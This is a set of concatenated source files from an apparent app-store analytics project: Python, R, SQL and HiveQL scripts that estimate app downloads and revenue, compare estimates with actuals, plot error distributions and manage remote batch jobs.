money_maker_commands.append(job_command)
commands = [svn_up_command] + money_maker_commands
self.execute_command(commands)
def execute_command(self, command):
if isinstance(command, basestring):
# Command is string
print '%s@%s: %s' % (self.user, self.host, command)
stdin, stdout, stderr = self.client.exec_command(command)
for line in stdout.read().splitlines():
print('%s' % line)
else:
# Command is list of strings
for command_entry in command:
print '%s@%s: %s' % (self.user, self.host, command_entry)
stdin, stdout, stderr = self.client.exec_command(command_entry)
for line in stdout.read().splitlines():
print('%s' % line)
def show_jobs(self):
command = 'screen -ls'
self.execute_command(command)
def kill_job(self, job_name):
if isinstance(job_name, basestring):
command = 'screen -S %s -X quit' % job_name
self.execute_command(command)
else:
for job_name_entry in job_name:
command = 'screen -S %s -X quit' % job_name_entry
self.execute_command(command)
def kill_all_detached_jobs(self):
"""
Kills all detached jobs.
"""
command = ("screen -ls | grep Detached | cut -d. -f1 | " +
"awk '{print $1}' | xargs kill")
self.execute_command(command)<file_sep>/old_investigations/android/internal/calculate_sda.py
import os.path
import pandas as pd
import numpy as np
CATEGORY_ID_OVERALL = 1
CATEGORY_ID_GAMES = 2
def calculate_sda_and_save(f_downloads, f_usd, f_reference):
"""Calculate SDA and save the results.
Arguments:
- `f_downloads`: Related downloads data.
- `f_usd`: Related USD data.
- `f_reference`: Reference file, containing the apps that we care.
"""
if f_reference:
# Extract the App ID that we care, it will save a lot of time.
df_reference = pd.read_csv(f_reference)
df_reference = aggregate_reference(df_reference)
app_ids = pd.Series.unique(df_reference['App ID'])
else:
app_ids = None
daterange_agg = aggregate_downloads_and_usd_and_save_daily(f_downloads, f_usd, app_ids)
meta_info = _extract_meta_info_in_filename(f_downloads)
if f_reference:
# Merge with reference file.
merged = pd.merge(df_reference, daterange_agg, how='left', on=['App ID', 'Unit'])
# Adjust the sequence of columns.
merged = merged.reindex(columns=['App ID', 'Market', 'Country', 'Month', 'Version', 'App Name',
'Publisher ID', 'Publisher Name', 'estimate_dailybest',
'estimate_dailyworst', 'estimate_overall',
'estimate_avg', 'App Estimate', 'units_avg', 'Unit',
'both_real_estimate_num'])
merged.rename(columns={'App Estimate': 'Current Best Estimation'}, inplace=True)
merged.to_csv("sda/SDA_%(country)s_%(daterange)s_With_Reference_Aggregated.csv" % meta_info,
index=False)
else:
daterange_agg.to_csv("sda/SDA_%(country)s_%(daterange)s_Aggregated.csv" % meta_info,
index=False)
def aggregate_reference(df):
grouped = df.groupby(['App ID', 'Unit'])
agg = grouped.aggregate({'App Estimate': np.nansum})
agg = agg.reset_index()
df_drop = df[['App ID', 'Country', 'Month', 'Version', 'App Name',
'Publisher ID', 'Publisher Name', 'Unit']]
merged = pd.merge(agg, df_drop, on=['App ID', 'Unit'], how='left')
merged = merged.groupby(['App ID', 'Unit']).apply(lambda x: x.head(1).drop(['App ID', 'Unit'],
axis=1))
merged = merged.reset_index(level=[0, 1])
merged['Market'] = 'all'
return merged
def aggregate_downloads_and_usd_and_save_daily(f_downloads, f_usd, app_ids):
meta_info = _extract_meta_info_in_filename(f_downloads)
df_downloads = pd.read_csv(f_downloads)
if not app_ids is None:
df_downloads = df_downloads.ix[df_downloads['app_id'].isin(app_ids)]
agg_downloads = _aggregate_df(df_downloads)
agg_downloads['Unit'] = 'Downloads'
df_usd = pd.read_csv(f_usd)
if not app_ids is None:
df_usd = df_usd.ix[df_usd['app_id'].isin(app_ids)]
agg_usd = _aggregate_df(df_usd)
agg_usd['Unit'] = 'USD'
# Combine Downloads and USD data.
agg = pd.concat((agg_downloads, agg_usd), axis=0)
agg.rename(columns={'app_id': 'App ID'}, inplace=True)
# This is the columns that we need.
agg = agg[['App ID', 'date', 'estimate_dailybest', 'estimate_dailyworst', 'estimate_avg',
'estimate_overall', 'estimate_games', 'units_avg', 'Unit']]
agg = agg.sort_index(by=['App ID', 'Unit', 'date'], ascending=False)
agg.to_csv("sda/SDA_%(country)s_%(daterange)s_Daily.csv" % meta_info, index=False)
# Go whole range aggregation.
# date is irrelevant now.
agg = agg.drop('date', axis=1)
agg['both_real_estimate_num'] = 1
daterange_agg = agg.groupby(['Unit', 'App ID']).aggregate(pd.Series.sum).reset_index()
return daterange_agg
def _extract_meta_info_in_filename(f):
"""For extracting meta info in filename.
The filename is supposed to be {country}_{startdate}--{enddate}_{Downloads|USD}.csv
"""
basename = os.path.basename(f)
basename_split = basename.split('_')
daterange = basename_split[1]
return {'country': basename_split[0], 'daterange': daterange}
def _aggregate_df(df):
print("Aggregating different feeds...")
grouped = df.groupby(['app_id', 'date', 'category_id'])
agg = grouped.aggregate({'estimate': np.nansum, 'units': pd.Series.mean})
print("Calculate daily estimate sda...")
return _calculate_daily_estimate_sda(agg.reset_index())
def _calculate_daily_estimate_sda(df):
# Only these columns are relevant.
df['error'] = (df['estimate'] - df['units']).abs()
grouped = df.groupby(['date', 'app_id'])
def pick_extreme_with_op(group, argop):
i = group.index[argop(group['error'])]
return group.ix[i][['estimate', 'units']]
print('Calculating worst.')
worst = grouped.apply(lambda x: pick_extreme_with_op(x, np.nanargmax))
worst.rename(columns={'estimate': 'estimate_dailyworst'}, inplace=True)
# We only need to keep one unit (units_avg)
worst = worst.drop('units', axis=1)
print('Calculating best.')
best = grouped.apply(lambda x: pick_extreme_with_op(x, np.nanargmin))
best.rename(columns={'estimate': 'estimate_dailybest'}, inplace=True)
best = best.drop('units', axis=1)
def use_overall(x):
v = x.ix[x['category_id'] == CATEGORY_ID_OVERALL]
if len(v) == 0:
return pd.Series([np.nan], index=['estimate'])
else:
return pd.Series([np.nansum(v['estimate'])], index=['estimate'])
def use_games(x):
v = x.ix[x['category_id'] == CATEGORY_ID_GAMES]
if len(v) == 0:
return pd.Series([np.nan], index=['estimate'])
else:
return pd.Series([np.nansum(v['estimate'])], index=['estimate'])
print('Calulating Overall.')
overall = grouped.apply(use_overall)
overall.rename(columns={'estimate': 'estimate_overall'}, inplace=True)
print('Calulating Games.')
games = grouped.apply(use_games)
games.rename(columns={'estimate': 'estimate_games'}, inplace=True)
print('Calculating avg.')
avg = grouped.aggregate({'estimate': pd.Series.mean, 'units': pd.Series.mean})
avg.rename(columns={'estimate': 'estimate_avg', 'units': 'units_avg'}, inplace=True)
return best.join(avg).join(worst).join(overall).join(games).reset_index().sort_index(by=['date', 'units_avg'],
ascending=False)
<file_sep>/old_investigations/plot_dist_daily_vs_overall.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
# Select only when we have estimate from Overall
sub_df= subset(df, !is.na(estimate_overall))
# Remove outlier
sub_df <- subset(sub_df, abs(estimate_avg - units_avg) / units_avg < 100)
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
# The default winner is SDA.
current_df$winner = "SDA"
# Where SDA loses.
sel = (abs(current_df$estimate_avg - current_df$units_avg) > abs(current_df$estimate_overall- current_df$units_avg))
current_df$winner[sel] = 'estimate_overall'
## This has to be put in the last!
## Use this if you want to seprate '< 5% difference' out
## sel = abs(((abs(current_df$estimate_avg - current_df$units_avg) / current_df$units_avg) - (abs(current_df$estimate_overall - current_df$units_avg) / current_df$units_avg))) < 0.05
## current_df$winner[sel] = '< 5% difference'
## Compress outliers.
m = mean(current_df$units_avg)
s = sd(current_df$units_avg)
current_df$units_avg[current_df$units_avg > (m + 2 * s)] = m + 2 * s
stacked_df = rbind(stacked_df, current_df)
}
plot <- plot_dist(stacked_df, metainfo)
ggsave(plot, file=paste('plots/',
paste(metainfo$country, metainfo$period, 'dist_daily_vs_overall.png', sep='_'), sep=''),
width=10, height=5)
<file_sep>/audience/legacy_experiments/model_ipv2.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: model for review demographic
#
#
##
from nltk.corpus import wordnet
from nltk.corpus import words
from collections import defaultdict
import pandas as pd
import os
import nltk
import numpy as np
from unidecode import unidecode
def main():
df_obs = pd.read_csv('/Users/antony/workspace/out.csv', error_bad_lines=False)
df_benchmark = pd.read_csv('/Users/antony/workspace/data/demie/benchmark_name.csv')
clean_name_set = set(df_benchmark['clean_name'].dropna())
remove_set = set(['in', 'my', 'fan', 'king', 'art', 'man', 'love', 'guy', 'rose', 'soon', 'cookie', 'mac', 'jc', 'happy',
'case', 'bear', 'sun', 'don', 'pa', 'queen', 'delta', 'ma', 'le', 'em', 'star', 'er'])
for i in clean_name_set:
if len(i) < 4:
remove_set.add(i)
for i in clean_name_set:
if wordnet.synsets(i):
remove_set.add(i)
for i in remove_set:
clean_name_set.discard(i)
df_obs = df_obs[0:10000]
df_obs.rename(columns={' reviewer ':'reviewer'}, inplace=True)
df_obs['reviewer'] = df_obs['reviewer'].astype(str)
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: x.strip())
df_obs.dropna()
df_obs.drop_duplicates()
df_obs['reviewer'] = df_obs['reviewer'].apply(lambda x: unidecode(x.decode('utf-8', "replace")))
pattern2 = r'''\s|[A-Z][a-z]*|[a-z]*|[+/\-@&*_]'''
df_obs['token'] = df_obs['reviewer'].apply(lambda x: nltk.regexp_tokenize(x, pattern2))
for i in range(len(df_obs['token'])):
#df_obs['token_l'][i] = set()
df_obs['token'][i] = [element.lower() for element in df_obs['token'][i]]
df_obs['token'] = df_obs['token'].apply(lambda x: set(x))
df_obs['token'] = df_obs['token'].apply(lambda x: x.intersection(clean_name_set))
df_obs.values
print '======== Done'
pass
if __name__ == '__main__':
main()<file_sep>/int-vs-m-benchmark/sql/ios/1000b1-prepare_transactional_data-collect_data.sql
/*
DESCRIPTION : collect daily transactional data for selected dates
INPUT TABLE(S) : appstore.downloads, appstore.appstore_instances, appstore.applications
temp.settings_day_weights, temp.settings_excluded_apps, temp.settings_appstore_instances
temp.settings_exchange_rates
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.one_off_and_iap
QUERY STEPS : 1. select dates to use for estimation
2. collect all transactional data, both one off and iap, for selected dates
*/
-- SELECTED TRANSACTIONAL DATES --
SELECT DATE(MIN(date)) FROM temp.settings_day_weights INTO @first_day_transactional;
-- collect all transactional data from appstore.downloads, both one off and iap at once
DROP TEMPORARY TABLE IF EXISTS temp.download_data_per_app;
CREATE TEMPORARY TABLE temp.download_data_per_app(
`date` date NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`application_id` int(10) unsigned NOT NULL,
`transaction_type` ENUM('free','paid') NOT NULL COLLATE 'utf8_unicode_ci',
`parent_id` int(10) unsigned NOT NULL,
`price_usd` DECIMAL(15,8) NOT NULL,
`expected_value` INT(11) NOT NULL,
`value` INT(11) NOT NULL,
iphone_app tinyint(1) DEFAULT NULL,
ipad_app tinyint(1) DEFAULT NULL,
weight DECIMAL(4,3),
CONSTRAINT PRIMARY KEY (date, country_id, application_id, transaction_type)
)
AS
SELECT
d.date,
sai.country_id,
d.application_id,
IF(d.customer_price = 0, 'free', 'paid') as transaction_type,
IFNULL(a.parent_id,a.id) as parent_id,
ROUND(SUM(d.value*(d.customer_price/ser.rate))/SUM(d.value),8) as price_usd, -- weighted price in case of price_change !
SUM(d.value) as expected_value,
SUM(IF(d.type in ('download_educational','gift_purchase'),0,d.value)) as value,
IF(DATE(@first_day_transactional) >= 20131114, MAX(IF(a.parent_id IS NOT NULL, NULL, IF(sai.device_id = 2, 0, 1))), NULL) AS iphone_app,
IF(DATE(@first_day_transactional) >= 20131114, MAX(IF(a.parent_id IS NOT NULL, NULL, IF(sai.device_id = 1, 0, 1))), NULL) AS ipad_app,
w.weight
FROM
appstore.downloads d
STRAIGHT_JOIN appstore.applications a ON a.id = d.application_id
JOIN temp.settings_day_weights w ON w.date = d.date
JOIN temp.settings_appstore_instances sai ON sai.appstore_instance_id = d.appstore_instance_id
LEFT JOIN temp.settings_excluded_apps sea ON sea.application_id=d.application_id
LEFT JOIN temp.settings_exchange_rates ser ON ser.id = d.customer_currency_id
WHERE
d.value > 0
AND sea.application_id IS NULL
-- nog beslissen over final types
-- maar als we minder types doen werkt de check ook niet meer...
-- dan misschien: 1 kolom (value) voor checken en 1 kolom value voor data die je gebruikt dus zoiets als SUM(IF(d.type IN ('download','subscription','subscription_renewal'), d.value, null)) AS value_to_use
AND d.type IN ('download','download_educational','gift_purchase','subscription','subscription_renewal')
GROUP BY date, country_id, application_id, d.customer_price = 0
;
SELECT COUNT(DISTINCT date) FROM temp.settings_day_weights WHERE weight > 0 INTO @transactional_days;
-- create weighted averaged transactional data from appstore.downloads table
-- at the same time, check if the total values from appstore.downloads match with appstore.downloads_meta_data
DROP TEMPORARY TABLE IF EXISTS temp.download_data_per_parent_app;
CREATE TEMPORARY TABLE temp.download_data_per_parent_app(
`date` date NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`application_id` int(10) unsigned NOT NULL,
`type` ENUM('gross','free','paid') NOT NULL,
`value` decimal(8,2),
`value_split` decimal(8,2),
`usable_split_data` tinyint(1) DEFAULT NULL,
iphone_app tinyint(1) DEFAULT NULL,
ipad_app tinyint(1) DEFAULT NULL,
CONSTRAINT PRIMARY KEY (date, country_id, type, application_id)
)
SELECT
date,
country_id,
parent_id AS application_id,
t.type,
ROUND(
CASE
WHEN t.type = 'gross' THEN x.revenue
WHEN t.type = 'paid' THEN x.paid_downloads
WHEN t.type = 'free' THEN x.free_downloads
END
,2) AS value,
ROUND(
CASE
WHEN t.type = 'gross' THEN x.revenue_split
WHEN t.type = 'paid' THEN x.paid_downloads_split
WHEN t.type = 'free' THEN x.free_downloads_split
END
,2) AS value_split,
IF(
CASE
WHEN t.type = 'gross' THEN x.revenue_split/x.expected_revenue
WHEN t.type = 'paid' THEN x.paid_downloads_split/x.expected_paid_downloads
WHEN t.type = 'free' THEN x.free_downloads_split/x.expected_free_downloads
END - 1 BETWEEN -0.03 AND 0.03, 1, 0
) AS usable_split_data,
iphone_app,
ipad_app
FROM (
SELECT
date,
country_id,
parent_id,
SUM(IF(transaction_type = 'free' AND d.parent_id = d.application_id, d.weight*d.collected_split_value, null)) as free_downloads_split,
SUM(IF(transaction_type = 'free' AND d.parent_id = d.application_id, d.weight*d.expected_value, null)) as expected_free_downloads,
SUM(IF(transaction_type = 'free' AND d.parent_id = d.application_id, d.weight*d.value, null)) as free_downloads,
SUM(IF(transaction_type = 'paid' AND d.parent_id = d.application_id, d.weight*d.collected_split_value, null)) as paid_downloads_split,
SUM(IF(transaction_type = 'paid' AND d.parent_id = d.application_id, d.weight*d.expected_value, null)) as expected_paid_downloads,
SUM(IF(transaction_type = 'paid' AND d.parent_id = d.application_id, d.weight*d.value, null)) as paid_downloads,
SUM(d.weight*d.collected_split_value*d.price_usd) AS revenue_split,
SUM(d.weight*d.expected_value*d.price_usd) AS expected_revenue,
SUM(d.weight*d.value*d.price_usd) AS revenue,
MAX(iphone_app) AS iphone_app,
MAX(ipad_app) AS ipad_app
FROM (
SELECT
d.date,
d.country_id,
d.parent_id,
d.transaction_type,
d.application_id,
d.value,
d.expected_value,
sum(m.value) as collected_split_value,
-- so you can calculate missing total revenue later
d.price_usd,
d.weight,
d.iphone_app,
d.ipad_app
FROM
temp.download_data_per_app d
LEFT JOIN appstore.downloads_meta_data m
USING (date, country_id, application_id, transaction_type)
-- filter out free inapps; we do not use them
WHERE NOT (d.transaction_type = 'free' AND d.parent_id <> d.application_id)
GROUP BY date,country_id,application_id,transaction_type
) d
GROUP BY date, country_id, parent_id
) x
JOIN (SELECT 'free' AS type UNION SELECT 'paid' AS type UNION SELECT 'gross' AS type) t
HAVING value IS NOT NULL AND value > 0
;
-- collect all split transactional data
DROP TEMPORARY TABLE IF EXISTS temp.transactional_data_split;
CREATE TEMPORARY TABLE temp.transactional_data_split(
`date` date NOT NULL,
`device_id` TINYINT unsigned NOT NULL,
`country_id` smallint(5) unsigned NOT NULL,
`type` ENUM('gross','free','paid') NOT NULL,
`application_id` int(10) unsigned NOT NULL,
value decimal(8,2) NOT NULL,
CONSTRAINT PRIMARY KEY (date, device_id, country_id, type, application_id)
)
SELECT
x.date,
x.device_id,
x.country_id,
t.type,
x.application_id,
ROUND(
CASE
WHEN t.type = 'gross' THEN x.revenue
WHEN t.type = 'paid' THEN x.paid_downloads
WHEN t.type = 'free' THEN x.free_downloads
END
,2) AS value
FROM (
SELECT
d.date,
e.device_id,
d.country_id,
d.parent_id as application_id,
SUM(
case
WHEN e.device_id = 1 AND m.platform in ('iPod','iPhone') THEN d.weight*m.value*d.price_usd
WHEN e.device_id = 2 AND m.platform in ('iPad','AppleTV') THEN d.weight*m.value*d.price_usd
ELSE NULL
end
) AS revenue,
SUM(
case
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 1
AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform in ('iPod','iPhone') THEN d.weight*m.value
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 2
AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform in ('iPad') THEN d.weight*m.value
WHEN d.ipad_app = 0 AND e.device_id = 1 AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
WHEN d.iphone_app = 0 AND e.device_id = 2 AND d.transaction_type = 'free' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
ELSE NULL
end
) AS free_downloads,
SUM(
case
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 1
AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND e.device_id = 1 AND m.platform in ('iPod','iPhone') THEN d.weight*m.value
WHEN ((d.iphone_app = 1 AND d.ipad_app = 1) OR (d.iphone_app is null AND d.ipad_app is null)) AND e.device_id = 2
AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND e.device_id = 2 AND m.platform in ('iPad') THEN d.weight*m.value
WHEN d.ipad_app = 0 AND e.device_id = 1 AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
WHEN d.iphone_app = 0 AND e.device_id = 2 AND d.transaction_type = 'paid' AND d.parent_id = d.application_id AND m.platform <> 'Desktop' THEN d.weight*m.value
ELSE NULL
end
) AS paid_downloads
FROM
temp.download_data_per_app d
JOIN appstore.downloads_meta_data m
USING (date, country_id, application_id, transaction_type)
JOIN (SELECT 1 AS device_id UNION SELECT 2 AS device_id) e
GROUP BY d.date, e.device_id, d.country_id, d.parent_id
) x
JOIN (SELECT 'free' AS type UNION SELECT 'paid' AS type UNION SELECT 'gross' AS type) t
HAVING value is NOT NULL AND value > 0
;
-- delete unusable split transactional data
DELETE temp.transactional_data_split.*
FROM temp.transactional_data_split
LEFT JOIN temp.download_data_per_parent_app u
USING(date, country_id, type, application_id)
WHERE u.application_id IS null
AND u.usable_split_data = 1
;
<file_sep>/aa_au_model/hiveql_scripts/get_sessions_per_device.sql
-- get the number of sessions and total length per date, device, country, bundle from app session data
-- change date range and folder to output data to on ds environment
DROP TABLE IF EXISTS app_sessions_per_device;
CREATE TABLE app_sessions_per_device
AS
SELECT datestr, device_id, country, bundleid, COUNT(*) AS sessions, ROUND(SUM((endtime-starttime)/1000),0) AS duration
FROM vpn_sample_data_session
WHERE datestr >= '2015-01-25'
AND datestr <= '2015-01-31'
GROUP BY datestr, device_id, country, bundleid
;
DROP TABLE if exists csvexport;
CREATE TABLE csvexport (
`datestr` string,
`device_id` string,
`country` string,
`bundleid` string,
`sessions` bigint,
`duration` double)
row format delimited fields terminated by '\t'
lines terminated by '\n'
STORED AS TEXTFILE
LOCATION 's3://aardvark-prod-pdx-ds-workspace/outputfolder';
;
INSERT OVERWRITE TABLE csvexport
SELECT * FROM app_sessions_per_device
<file_sep>/int-vs-m-benchmark/sql/0-settings-android.sql
-- Version --
SET @version = 14;
-- Time settings --
SET @date=20140604;
SET @run_timestamp = CURRENT_TIMESTAMP(3);
-- Stored procedures and estimates DB
USE estimates_dev;
SET @current_db = DATABASE();
SET @current_user = SUBSTRING(USER(),1,LOCATE('@',USER())-1);
-- Exclude apps from estimation --
SET @exclude_application_ids = '';
-- Exclude known preinstalls
SET @exclude_preinstalled_application_ids =
CONCAT('113,6778,6979,7539,15238,18545,20084,25406,35636,58443,62720,',
'79188,88977,127606,166697,183731,197336,199731,234834,248557,421144,',
'527508,550323,625134,665595,932882,938035,1168498,1188274,1219512,',
'1889271,2595933');
-- Countries --
SET @countries_free = 'NL,US';
SET @countries_paid = 'NL,US';
SET @countries_gross = 'NL,US';
-- Day weigths --
-- In this variable you can set the days to calculate the weighted average åç
-- of the downloads/revenues that are taken into account in the ranking
-- algorithm. The first element is the weight for the day before @date.
-- Note that the max. number of day weights is 10
SET @day_weights = '0,1,1,1,1,1,1,1,1';
-- General regression parameters --
SET @regression_b2_max = 20;
SET @regression_b2_stepsize = 1;
-- Set table names ---
SET @application_data_market_table = CONCAT(@current_db,'.application_data_market');
SET @estimation_market_table = CONCAT(@current_db,'.new_estimation_market');
SET @best_estimations_market_table = CONCAT(@current_db,'.best_estimations_market');
SET @sync_estimates_dev_best_estimations=0;
SET @reset_tables_for_all_countries = 0;
-- By default only data for estimated countries is removed from the tables.
-- Country quality settings for reporting --
-- set the country quality; this is only used
-- for the data checks
SET @low_quality_countries = 'CZ,PL,BG,CL,CY,EG,EE,GH,GR,HU,IS,LV,LT,LU,MY,PT,RO,SK,SI,UA,CI,CM,IR,KE,NI,SN';
-- Best estimations lock time out --
-- set how long the algorithm waits for the best estimations lock before
-- erroring
SET @lock_best_estimations_table = IF(@current_db = 'estimates', 1, 0);
SET @best_estimations_lock_name = CONCAT(@current_db, '_market_best_estimations_lock');
SET @best_estimations_lock_time_out = 1800;<file_sep>/old_investigations/plot_dist.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
max_day = max(df$both_real_estimate_num, na.rm=TRUE)
# Select only when we have max days
sub_df= subset(df, (both_real_estimate_num == max_day))
df = sub_df
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
# The default winner is SDA.
current_df$winner = "SDA"
# Where SDA loses.
sel = (abs(current_df$estimate_avg - current_df$units_avg) > abs(current_df$Current.Best.Estimation - current_df$units_avg))
current_df$winner[sel] = 'Current.Best.Estimation'
## This has to be put in the last!
## Use this if you want to seprate '< 5% difference' out
## sel = abs(((abs(current_df$estimate_avg - current_df$units_avg) / current_df$units_avg) - (abs(current_df$Current.Best.Estimation - current_df$units_avg) / current_df$units_avg))) < 0.05
## current_df$winner[sel] = '< 5% difference'
## Compress outliers.
m = mean(current_df$units_avg)
s = sd(current_df$units_avg)
current_df$units_avg[current_df$units_avg > (m + 2 * s)] = m + 2 * s
stacked_df = rbind(stacked_df, current_df)
}
plot <- plot_dist(stacked_df, metainfo)
ggsave(plot, file=paste('plots/', paste(metainfo$country, metainfo$period, 'dist.png', sep='_'), sep=''), width=10, height=5)
<file_sep>/review-sentiment-analysis/lib/constants.py
__author__ = 'hgriffioen'
DATA_DIR = r'/home/vagrant/data/demie'
#DATA_DIR = '/Users/rafael/appannie/data/demie'
#reviews_file = 'reviews_143441_2014-01--2014-06.csv'
reviews_file = 'sampled_reviews_143441_2014-01--2014-06.csv'
SOME_FIXED_SEED = 42
DELIMITER = ' '
JOBS = 6
PARALLEL_CHUNK_SIZE = 50000
MIN_N = 2
MAX_N = 2
<file_sep>/aa_au_model/heavy_usage/README.MD
# Heavy user investigation
Investigate users who use up a disproportionate amount of bandwidth.
## Notebooks:
<li> <code>Heavy user characterization</code>: generate plots for presentation "DEV - AARDVARK - Whale Users Analysis" </li>
<li> <code>MDM bandwidth distributions</code>: investigate MDM distributions </li>
<li> <code>Impact Scenarios</code>: assess impact of three scenarios (see "DS - Aardvark - VPN heavy users blocking") </li>
## Data
Data structures are a bit a mess because of the ad-hoc work. In general, if a data structure ends with <code>$month$\_01</code> it is monthly data (e.g. <code>2015\_04\_01</code>), <code>$month$\_XX</code> with <code>XX != 01</code> is weekly data (e.g. <code>2015\_04\_45</code>). For months the begin date is used, for weeks the end date. Sometimes underscores are used, sometimes not. Yes. Align begin and start dates of files yourself.
### MDM data
All MDM data was queried from Redshift using the Notebook ../Mobidia export.ipynb locally.
<li> <code>mobidia\_bandwidth\_usage\_2015$month$$day$.csv</code>: Monthly/weekly bandwidth, see <code>sql/get\_mdm\_bandwidth.sql</code> </li>
<li> <code>mdm\_monthly\_2015$month$$day$.csv</code>: Monthly/weekly usage, see <code>get\_mdm\_usage.sql</code> </li>
### VPN data
All VPN data was queried on Hive.
<li><code>vpn\_ios\_bandwidth\_usage\_2015\_04.tsv</code>: Monthly bandwidth usage from April and later, see <code>sql/get\_monthly\_device\_bandwidth.sql</code> </li>
<li><code>sample\_usage\_2015\_$month$\_$day$.tsv</code>: Monthly/weekly usage for sample users, see <code>sql/get\_sample\_user\_stats.sql</code> tables <code>monthly\_device\_usage</code> and <code>weekly\_device\_usage</code> </li>
<li><code>sample\_usage\_2015\_$month$\_$day$.tsv</code>: Monthly/weekly bandwidth for sample users, see <code>sample\_users\_bandwidth\_2015\_$month$\_$day$.tsv</code> tables <code>period\_users</code> and <code>period\_users\_week</code> </li>
<file_sep>/sbe_benchmark/model_pv8.py
##
# KPI_analysis_ios_nonnuniv version 3
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Simulate the SBE solution on the data set Debug
# Also include the SBE error comparison with Auto_segmted SBE
##
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
import os
#import config
#import operator
#import math
import csv
#import statsmodels.formula.api as sm
import statsmodels.regression.linear_model as sm
#from sklearn.svm import SVR
import numpy as np
#from rpy import *
import datetime as dt
from sklearn.cross_validation import KFold
# from numpy import NA as NA
import bz2
result = None
gres = []
feed_market_format = { 0: 'Free',
1: 'Paid',
2: 'Grossing',
}
def fun(x):
if np.isnan(x):
return 0
else:
return 1/pow(float(x),2 )
def wavg(group):
d = group['t1e']
w = group['nb_obs']
return (d * w).sum() / w.sum()
def preprocess_metadata(df):
df['iphone_estimate'] = df['iphone_estimate'].fillna(0)
df['ipad_estimate'] = df['ipad_estimate'].fillna(0)
df['actual_log']=np.log(df['actual'])
df['Daily.Estimate']=df['iphone_estimate'] + df['ipad_estimate']
df['r1_log']=np.log(df['iphone_rank']+1.0)
df['r2_log']=np.log(df['ipad_rank']+1.0)
df['r1_inv']=1.0/df['iphone_rank']
df['r2_inv']=1.0/df['ipad_rank']
df['weekday'] = df['date'].apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%d').weekday())
df['isMon'] = 0
df['isTue'] = 0
df['isWed'] = 0
df['isThu'] = 0
df['isFri'] = 0
df['isSat'] = 0
df['isSun'] = 0
df['isMon'][(df['weekday'] == 0)] = 1
df['isTue'][(df['weekday'] == 1)] = 1
df['isWed'][(df['weekday'] == 2)] = 1
df['isThu'][(df['weekday'] == 3)] = 1
df['isFri'][(df['weekday'] == 4)] = 1
df['isSat'][(df['weekday'] == 5)] = 1
df['isSun'][(df['weekday'] == 6)] = 1
#df['wt_rank_iphone'] = 1.0/df['iphone_rank']**2
#df['wt_rank_ipad'] = 1.0/df['ipad_rank'] ** 2
#df['wt_rank_iphone'] = df['wt_rank_iphone'].fillna(0)
#df['wt_rank_ipad'] = df['wt_rank_ipad'].fillna(0)
#df['wt_rank'] = df['wt_rank_iphone'] + df['wt_rank_ipad']
#df['wt_perc'] = 1.0 / df['actual']
#del df['wt_rank_iphone']
#del df['wt_rank_ipad']
df = df.drop_duplicates()
return df
def regression(df, fdate, ldate):
startdate = fdate
enddate = ldate
gres = []
for n, g in df.groupby(['category_id', 'feed_id']):
dates = g['date'].drop_duplicates()
for date in dates:
if (date > enddate) or (date < startdate):
continue
print n, date
df_obs = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=7)).isoformat() )]
df_obs = df_obs.reset_index()
app_ids = df_obs[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
#kf = KFold(len(df_obs), n_folds=5, indices=True, shuffle=True)
#print('iphone_only')
test_out1 = []
try:
model_ra1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == True) & (np.isnan(df_obs['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_ra1 = model_ra1.fit()
for tr, te in kf:
train = df_obs[df_obs['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
test1 = test.dropna(subset = ['r1_log'])
test1 = test1[test1['date'] == date]
try:
model_r1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == False) & (np.isnan(train['r2_log']) == True) & (np.isnan(train['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_r1 = model_r1.fit()
test1['t1e'] = list(np.exp(fitted_r1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']])))
